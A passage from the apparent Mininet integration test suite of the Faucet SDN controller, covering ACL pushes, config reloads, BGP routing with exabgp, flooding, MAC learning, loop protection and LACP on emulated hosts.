ip_proto: 6
ipv4_dst: 127.0.0.1
ipv4_src: 127.0.0.1
tcp_dst: 65535
tcp_src: 65535
"""
def setUp(self):
super().setUp()
self.acl_config_file = os.path.join(self.tmpdir, 'acl.txt')
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
with open(self.acl_config_file, 'w') as acf:
acf.write(self.START_ACL_CONFIG)
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def _push_tuples(self, eth_type, host_ips):
max_rules = len(host_ips)
rules = 1
while rules <= max_rules:
rules_yaml = []
for rule in range(rules):
host_ip = host_ips[rule]
port = (rule + 1) % 2**16
ip_match = str(host_ip)
rule_yaml = {
'eth_type': eth_type,
'ip_proto': 6,
'tcp_src': port,
'tcp_dst': port,
'ipv%u_src' % host_ip.version: ip_match,
'ipv%u_dst' % host_ip.version: ip_match,
'actions': {'allow': 1},
}
rules_yaml.append({'rule': rule_yaml})
yaml_acl_conf = {'acls': {1: {'exact_match': True, 'rules': rules_yaml}}}
tuple_txt = '%u IPv%u tuples\n' % (len(rules_yaml), host_ip.version)
error('pushing %s' % tuple_txt)
self.reload_conf(
yaml_acl_conf, self.acl_config_file, # pytype: disable=attribute-error
restart=True, cold_start=False)
error('pushed %s' % tuple_txt)
self.wait_until_matching_flow(
{'tp_src': port, 'ip_proto': 6, 'dl_type': eth_type}, table_id=0)
rules *= 2
def test_tuples(self):
host_ips = list(itertools.islice(self.NET_BASE.hosts(), self.MAX_RULES))
self._push_tuples(self.ETH_TYPE, host_ips)
class FaucetIPv6TupleTest(FaucetIPv4TupleTest):
MAX_RULES = 1024
ETH_TYPE = IPV6_ETH
NET_BASE = ipaddress.IPv6Network('fc00::00/64')
START_ACL_CONFIG = """
acls:
1:
exact_match: True
rules:
- rule:
actions: {allow: 1}
eth_type: 34525
ip_proto: 6
ipv6_dst: ::1
ipv6_src: ::1
tcp_dst: 65535
tcp_src: 65535
"""
class FaucetConfigReloadTestBase(FaucetTest):
"""Test handling HUP signal with config change."""
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: allow
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
tagged_vlans: [200]
"""
ACL = """
acls:
1:
- rule:
description: "rule 1"
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
cookie: COOKIE
actions:
allow: 1
2:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 1
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 0
- rule:
cookie: COOKIE
actions:
allow: 1
3:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5003
actions:
allow: 0
4:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
deny:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 65535
actions:
allow: 0
- rule:
cookie: COOKIE
actions:
allow: 0
allow:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 65535
actions:
allow: 1
- rule:
cookie: COOKIE
actions:
allow: 1
"""
ACL_COOKIE = None
def setUp(self):
super().setUp()
self.ACL_COOKIE = random.randint(1, 2**16 - 1)
self.ACL = self.ACL.replace('COOKIE', str(self.ACL_COOKIE))
self.acl_config_file = '%s/acl.yaml' % self.tmpdir
with open(self.acl_config_file, 'w') as config_file:
config_file.write(self.ACL)
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
class FaucetDelPortTest(FaucetConfigReloadTestBase):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: allow
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 200
"""
def test_port_down_flow_gone(self):
last_host = self.hosts_name_ordered()[-1]
self.require_host_learned(last_host)
second_host_dst_match = {'eth_dst': last_host.MAC()}
self.wait_until_matching_flow(
second_host_dst_match, table_id=self._ETH_DST_TABLE)
self.change_port_config(
self.port_map['port_4'], None, None,
restart=True, cold_start=None)
self.wait_until_no_matching_flow(
second_host_dst_match, table_id=self._ETH_DST_TABLE)
class FaucetConfigReloadTest(FaucetConfigReloadTestBase):
def test_add_unknown_dp(self):
conf = self._get_faucet_conf()
conf['dps']['unknown'] = {
'dp_id': int(self.rand_dpid()),
'hardware': 'Open vSwitch',
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_tabs_are_bad(self):
self._enable_event_log()
self.ping_all_when_learned()
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
good_config_hash_info = event['CONFIG_CHANGE']['config_hash_info']
self.assertNotEqual('', good_config_hash_info['hashes'])
orig_conf = self._get_faucet_conf()
self.force_faucet_reload(
'\t'.join(('tabs', 'are', 'bad')))
self.assertEqual(1, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: not event['CONFIG_CHANGE']['success'])
self.assertEqual('', event['CONFIG_CHANGE']['config_hash_info']['hashes'])
self.ping_all_when_learned()
self.reload_conf(
orig_conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
self.assertEqual(good_config_hash_info, event['CONFIG_CHANGE']['config_hash_info'])
def test_port_change_vlan(self):
first_host, second_host = self.hosts_name_ordered()[:2]
third_host, fourth_host = self.hosts_name_ordered()[2:]
self.ping_all_when_learned()
self.change_port_config(
self.port_map['port_1'], 'native_vlan', 200,
restart=False, cold_start=False)
self.wait_until_matching_flow(
{'vlan_vid': 200}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.change_port_config(
self.port_map['port_2'], 'native_vlan', 200,
restart=True, cold_start=False)
for port_name in ('port_1', 'port_2'):
self.wait_until_matching_flow(
{'in_port': int(self.port_map[port_name])},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:4296}'])
self.one_ipv4_ping(first_host, second_host.IP(), require_host_learned=False)
# hosts 1 and 2 now in VLAN 200, so they shouldn't see floods for 3 and 4.
self.verify_vlan_flood_limited(
third_host, fourth_host, first_host)
def test_port_change_acl(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
orig_conf = self._get_faucet_conf()
self.change_port_config(
self.port_map['port_1'], 'acl_in', 1,
cold_start=False)
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1']),
'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
table_id=self._PORT_ACL_TABLE, cookie=self.ACL_COOKIE)
self.wait_until_matching_flow(
{'vlan_vid': 100}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
self.reload_conf(
orig_conf, self.faucet_config_path,
restart=True, cold_start=False, host_cache=100)
self.verify_tp_dst_notblocked(
5001, first_host, second_host, table_id=None)
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=None)
def test_port_change_perm_learn(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
self.change_port_config(
self.port_map['port_1'], 'permanent_learn', True,
restart=True, cold_start=False)
self.ping_all_when_learned(hard_timeout=0)
original_third_host_mac = third_host.MAC()
third_host.setMAC(first_host.MAC())
self.assertEqual(100.0, self.ping((second_host, third_host)))
self.retry_net_ping(hosts=(first_host, second_host))
third_host.setMAC(original_third_host_mac)
self.ping_all_when_learned(hard_timeout=0)
self.change_port_config(
self.port_map['port_1'], 'acl_in', 1,
restart=True, cold_start=False)
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1']),
'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
table_id=self._PORT_ACL_TABLE)
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetDeleteConfigReloadTest(FaucetConfigReloadTestBase):
def test_delete_interface(self):
# With all ports changed, we should cold start.
conf = self._get_faucet_conf()
del conf['dps'][self.DP_NAME]['interfaces']
conf['dps'][self.DP_NAME]['interfaces'] = {
int(self.port_map['port_1']): {
'native_vlan': 100,
'tagged_vlans': [200],
}
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
class FaucetRouterConfigReloadTest(FaucetConfigReloadTestBase):
def test_router_config_reload(self):
conf = self._get_faucet_conf()
conf['routers'] = {
'router-1': {
'vlans': [100, 200],
}
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
class FaucetConfigReloadAclTest(FaucetConfigReloadTestBase):
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acls_in: [allow]
%(port_2)d:
native_vlan: 100
acl_in: allow
%(port_3)d:
native_vlan: 100
acl_in: deny
%(port_4)d:
native_vlan: 100
acl_in: deny
"""
def _verify_hosts_learned(self, hosts):
self.ping_all()
for host in hosts:
self.require_host_learned(host)
self.assertEqual(len(hosts), self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': '100'}))
def test_port_acls(self):
hup = not self.STAT_RELOAD
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self._verify_hosts_learned((first_host, second_host))
self.change_port_config(
self.port_map['port_3'], 'acl_in', 'allow',
restart=True, cold_start=False, hup=hup)
self.change_port_config(
self.port_map['port_1'], 'acls_in', [3, 4, 'allow'],
restart=True, cold_start=False, hup=hup)
self.coldstart_conf(hup=hup)
self._verify_hosts_learned((first_host, second_host, third_host))
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
self.verify_tp_dst_blocked(5003, first_host, second_host)
class FaucetConfigReloadMACFlushTest(FaucetConfigReloadTestBase):
def test_port_change_vlan(self):
self.ping_all_when_learned()
self.assertEqual(4, len(self.scrape_prometheus(var='learned_l2_port')))
self.change_port_config(
self.port_map['port_1'], 'native_vlan', 200,
restart=False, cold_start=False)
self.wait_until_matching_flow(
{'vlan_vid': 200}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.change_port_config(
self.port_map['port_2'], 'native_vlan', 200,
restart=True, cold_start=False)
for port_name in ('port_1', 'port_2'):
self.wait_until_matching_flow(
{'in_port': int(self.port_map[port_name])},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:4296}'])
self.assertEqual(0, len(self.scrape_prometheus(var='learned_l2_port')))
class FaucetConfigReloadEmptyAclTest(FaucetConfigReloadTestBase):
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
300:
description: "untagged"
acls_in: [1]
"""
STAT_RELOAD = '1'
def test_port_acls(self):
hup = not self.STAT_RELOAD
self.change_port_config(
self.port_map['port_3'], 'acls_in', [],
restart=True, cold_start=False, hup=hup, change_expected=False)
self.change_port_config(
self.port_map['port_1'], 'acls_in', [],
restart=True, cold_start=False, hup=hup, change_expected=False)
class FaucetConfigStatReloadAclTest(FaucetConfigReloadAclTest):
# Use the stat-based reload method.
STAT_RELOAD = '1'
class FaucetUntaggedBGPDualstackDefaultRouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import default route from BGP."""
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24", "fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}, default=0),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
for _ in range(2):
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.one_ipv4_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv4DefaultRouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import default route from BGP."""
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}, default=0),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.one_ipv4_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv4RouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import from BGP."""
NUM_FAUCET_CONTROLLERS = 1
NUM_GAUGE_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: 10.99.99.0/24
ip_gw: 10.0.0.1
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 10.0.1.0/24 next-hop 10.0.0.1 local-preference 100;
route 10.0.2.0/24 next-hop 10.0.0.2 local-preference 100;
route 10.0.3.0/24 next-hop 10.0.0.2 local-preference 100;
route 10.0.4.0/24 next-hop 10.0.0.254;
route 10.0.5.0/24 next-hop 10.10.0.1;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
# wait until 10.0.0.1 has been resolved
self.wait_for_route_as_flow(
first_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'))
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.verify_invalid_bgp_route(r'.+10.0.4.0\/24.+cannot be us$')
self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.0.3.0/24'))
self.verify_ipv4_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv4_routing_mesh()
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
self.verify_traveling_dhcp_mac()
class FaucetUntaggedIPv4RouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and export to BGP."""
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(mininet_test_util.LOCALHOST)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes sent."""
self.verify_ipv4_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv4_routing_mesh()
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
# exabgp should have received our BGP updates
updates = self.exabgp_updates(self.exabgp_log)
for route_string in (
'10.0.0.0/24 next-hop 10.0.0.254',
'10.0.1.0/24 next-hop 10.0.0.1',
'10.0.2.0/24 next-hop 10.0.0.2',
'10.0.3.0/24 next-hop 10.0.0.2'):
self.assertTrue(re.search(route_string, updates), msg=updates)
# test nexthop expired when port goes down
first_host = self.hosts_name_ordered()[0]
match, table = self.match_table(ipaddress.IPv4Network('10.0.0.1/32'))
ofmsg = None
for _ in range(5):
self.one_ipv4_controller_ping(first_host)
ofmsg = self.get_matching_flow(match, table_id=table)
if ofmsg:
break
time.sleep(1)
self.assertTrue(ofmsg, msg=match)
self.set_port_down(self.port_map['port_1'])
for _ in range(5):
if not self.get_matching_flow(match, table_id=table):
return
time.sleep(1)
self.fail('host route %s still present' % match)
class FaucetUntaggedRestBcastIPv4RouteTest(FaucetUntaggedIPv4RouteTest):
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_2)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_3)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_4)d:
native_vlan: 100
restricted_bcast_arpnd: true
"""
class FaucetUntaggedVLanUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: True
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.ping_all_when_learned()
self.assertTrue(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoVLanUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedPortUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
unicast_flood: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# VLAN level config to disable flooding takes precedence,
# cannot enable port-only flooding.
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoPortUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: True
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
unicast_flood: False
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedHostMoveTest(FaucetUntaggedTest):
def test_untagged(self):
self._enable_event_log()
first_host, second_host = self.hosts_name_ordered()[0:2]
for _ in range(2):
self.retry_net_ping(hosts=(first_host, second_host))
self.ping((first_host, second_host))
for host, in_port in (
(first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])):
self.require_host_learned(host, in_port=in_port)
self.swap_host_macs(first_host, second_host)
for port in (self.port_map['port_1'], self.port_map['port_2']):
self.wait_until_matching_lines_from_file(
r'.+L2_LEARN.+"previous_port_no": %u.+' % port, self.event_log)
class FaucetUntaggedHostPermanentLearnTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
permanent_learn: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.ping_all_when_learned(hard_timeout=0)
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
# 3rd host impersonates 1st but 1st host still OK
original_third_host_mac = third_host.MAC()
third_host.setMAC(first_host.MAC())
self.assertEqual(100.0, self.ping((second_host, third_host)))
self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
self.assertFalse(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_3']))
self.retry_net_ping(hosts=(first_host, second_host))
# 3rd host stops impersonating, now everything fine again.
third_host.setMAC(original_third_host_mac)
self.ping_all_when_learned(hard_timeout=0)
class FaucetCoprocessorTest(FaucetUntaggedTest):
N_UNTAGGED = 3
N_TAGGED = 1
CONFIG = """
interfaces:
%(port_1)d:
coprocessor: {strategy: vlan_vid}
mirror: %(port_4)d
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Inject packet into pipeline using coprocessor.
coprocessor_host, first_host, second_host, _ = self.hosts_name_ordered()
self.one_ipv4_ping(first_host, second_host.IP())
tcpdump_filter = ' and '.join((
'ether dst %s' % first_host.MAC(),
'ether src %s' % coprocessor_host.MAC(),
'icmp'))
cmds = [
lambda: coprocessor_host.cmd(
'arp -s %s %s' % (first_host.IP(), first_host.MAC())),
lambda: coprocessor_host.cmd(
'fping %s -c3 %s' % (self.FPING_ARGS_SHORT, first_host.IP())),
]
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, cmds, timeout=5, vflags='-vv', packets=1)
self.assertFalse(self.tcpdump_rx_packets(tcpdump_txt, packets=0))
class FaucetUntaggedLoopTest(FaucetTest):
NUM_DPS = 1
N_TAGGED = 0
N_UNTAGGED = 2
LINKS_PER_HOST = 2
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
loop_protect: True
%(port_4)d:
native_vlan: 100
loop_protect: True
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def total_port_bans(self):
total_bans = 0
for i in range(self.LINKS_PER_HOST * self.N_UNTAGGED):
port_labels = self.port_labels(self.port_map['port_%u' % (i + 1)])
total_bans += self.scrape_prometheus_var(
'port_learn_bans', port_labels, dpid=True, default=0)
return total_bans
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()
# Normal learning works
self.one_ipv4_ping(first_host, second_host.IP())
start_bans = self.total_port_bans()
# Create a loop between interfaces on second host - a veth pair,
# with two bridges, each connecting one leg of the pair to a host
# interface.
self.quiet_commands(second_host, (
'ip link add name veth-loop1 type veth peer name veth-loop2',
'ip link set veth-loop1 up',
'ip link set veth-loop2 up',
# TODO: tune for loop mitigation performance.
'tc qdisc add dev veth-loop1 root tbf rate 1000kbps latency 10ms burst 1000',
'tc qdisc add dev veth-loop2 root tbf rate 1000kbps latency 10ms burst 1000',
# Connect one leg of veth pair to first host interface.
'brctl addbr br-loop1',
'brctl setfd br-loop1 0',
'ip link set br-loop1 up',
'brctl addif br-loop1 veth-loop1',
'brctl addif br-loop1 %s-eth0' % second_host.name,
# Connect other leg of veth pair.
'brctl addbr br-loop2',
'brctl setfd br-loop2 0',
'ip link set br-loop2 up',
'brctl addif br-loop2 veth-loop2',
'brctl addif br-loop2 %s-eth1' % second_host.name))
# Flood some traffic into the loop
for _ in range(3):
first_host.cmd('fping %s -c3 10.0.0.254' % self.FPING_ARGS_SHORT)
end_bans = self.total_port_bans()
if end_bans > start_bans:
return
time.sleep(1)
self.assertGreater(end_bans, start_bans)
# Break the loop, and learning should work again
self.quiet_commands(second_host, (
'ip link set veth-loop1 down',
'ip link set veth-loop2 down',))
self.one_ipv4_ping(first_host, second_host.IP())
class FaucetUntaggedIPv4LACPTest(FaucetTest):
NUM_DPS = 1
N_TAGGED = 0
N_UNTAGGED = 2
LINKS_PER_HOST = 2
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
lacp_timeout: 3
interfaces:
%(port_1)d:
native_vlan: 100
lacp: 1
lacp_port_priority: 1
lacp_port_id: 100
%(port_2)d:
native_vlan: 100
lacp: 1
lacp_port_priority: 2
lacp_port_id: 101
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
def get_lacp_port_id(port):
port_labels = self.port_labels(port)
lacp_port_id = self.scrape_prometheus_var('lacp_port_id', port_labels, default=0)
return lacp_port_id
bond = 'bond0'
# Linux driver should have this state (0x3f/63)
#
# Actor State: 0x3f, LACP Activity, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
# .... ...1 = LACP Activity: Active
# .... ..1. = LACP Timeout: Short Timeout
# .... .1.. = Aggregation: Aggregatable
